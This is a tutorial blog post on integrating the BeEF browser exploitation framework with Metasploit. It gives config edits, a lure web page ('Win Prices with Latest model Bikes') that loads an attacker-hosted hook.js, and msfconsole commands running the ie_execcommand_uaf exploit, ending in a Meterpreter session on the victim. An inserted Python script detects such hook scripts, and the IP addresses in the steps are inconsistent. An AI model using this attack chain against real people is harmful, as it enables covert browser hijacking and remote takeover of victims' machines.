In the last post we got started with BeEF, covering how to insert a JavaScript link in a page and compromise a client’s browser.
The Browser Exploitation Framework (BeEF) has some awesome exploitation modules of its own, but when you combine it with the added awesome sauce that is Metasploit you get to have even more fun.
But you will have no Metasploit Framework integration by default.
Let’s fix that by first editing the /usr/share/beef-xss/config.yaml file. You should have something like this:
Obviously, we would like to change the metasploit part (lines 20 and 21) to this:
#vi /usr/share/beef-xss/config.yaml
metasploit:
    enable: true
Next, we will edit the /usr/share/beef-xss/extensions/metasploit/config.yaml file and change it to this:
You need to edit the host: and callback_host: lines (put your IP address there) and the {os: 'custom', path: ''} line (just paste '/usr/share/metasploit-framework/' as the path).
#vi /usr/share/beef-xss/extensions/metasploit/config.yaml
host: "192.168.31.20"
pass: "bhuvi"
callback_host: "192.168.31.20"
{os: 'custom', path: '/usr/share/metasploit-framework'}
Now, we are ready to start msfconsole, and load the msgrpc module like this:
#/etc/init.d/postgresql restart && /etc/init.d/metasploit restart
msf > load msgrpc ServerHost=192.168.31.10 Pass=bhuvi
And now, we can start BeEF:
#cd /usr/share/beef-xss/
#./beef
Among the BeEF start-up messages, you should see something like:
[*] Successful connection with Metasploit.
[*] Loaded 232 Metasploit exploits.
For testing, we are going to create an HTML page with the JavaScript hook embedded.
#vi /var/www/index.html
<html>
<head>
<title> Win Prices with Latest model Bikes. </title>
<script src="http://192.168.31.20:3000/hook.js"></script>
</head>
<body>
<img src="bike.jpg"/>
</body>
</html>
Download bike.jpg from Google and put it in the /var/www directory.
Now when any client opens the URL http://192.168.31.20, the hook is set. Notice that the user does not have to run anything or mouse over anything for the attack to work. Just visiting the page triggers the attack.
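From the defender's side, a hooked page like the one above can be found by auditing the script tags a site serves. The following is an added example, not part of the original post: it flags scripts matching the hook file name and port shown on this page (hook.js, port 3000). The function names and sample page are constructed for illustration, and a match is an indicator to investigate, not proof.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Indicators taken from this page: BeEF's hook file name and listener port.
HOOK_NAME = "hook.js"
HOOK_PORT = 3000


class ScriptAudit(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())


def find_hook_scripts(html, page_host):
    """Return (src, reasons) for each script that looks like a BeEF hook."""
    audit = ScriptAudit()
    audit.feed(html)
    findings = []
    for src in audit.sources:
        url = urlsplit(src)
        try:
            port = url.port
        except ValueError:  # malformed port in the URL
            port = None
        reasons = []
        if url.path.rsplit("/", 1)[-1].lower() == HOOK_NAME:
            reasons.append("script named hook.js")
        if port == HOOK_PORT:
            reasons.append("served from port 3000")
        # A third-party host alone is normal (CDNs), so it only adds context.
        if reasons and url.hostname and url.hostname != page_host:
            reasons.append("third-party host")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    # Constructed sample page, modelled on the test page above.
    sample = '<script src="http://192.168.31.20:3000/hook.js"></script>'
    print(find_hook_scripts(sample, "www.example.com"))
```

Run it over HTML fetched from your own sites or pulled from proxy captures, passing the host the page was served from as page_host.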
Go back to the BeEF Control Panel and click on “Online Browsers” on the top left. After a few seconds you should see the IP address pop up, representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.
Now it’s time to use Metasploit. After getting complete control of the victim’s browser, use the redirect command to point it at the Metasploit listener.
#msfconsole
msf > load msgrpc ServerHost=192.168.31.10 Pass=bhuvi
msf > use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf) > show options
msf exploit(ie_execcommand_uaf) > set SRVHOST 192.168.31.20
msf exploit(ie_execcommand_uaf) > set SRVPORT 8080
msf exploit(ie_execcommand_uaf) > set URIPATH /
msf exploit(ie_execcommand_uaf) > exploit
Now check out the BeEF control panel. In my case it’s http://192.168.31.20:3000/ui/panel. In the command section, click the redirect browser command and enter the Metasploit listener http://192.168.31.2:8080.
Then you will get a Meterpreter session.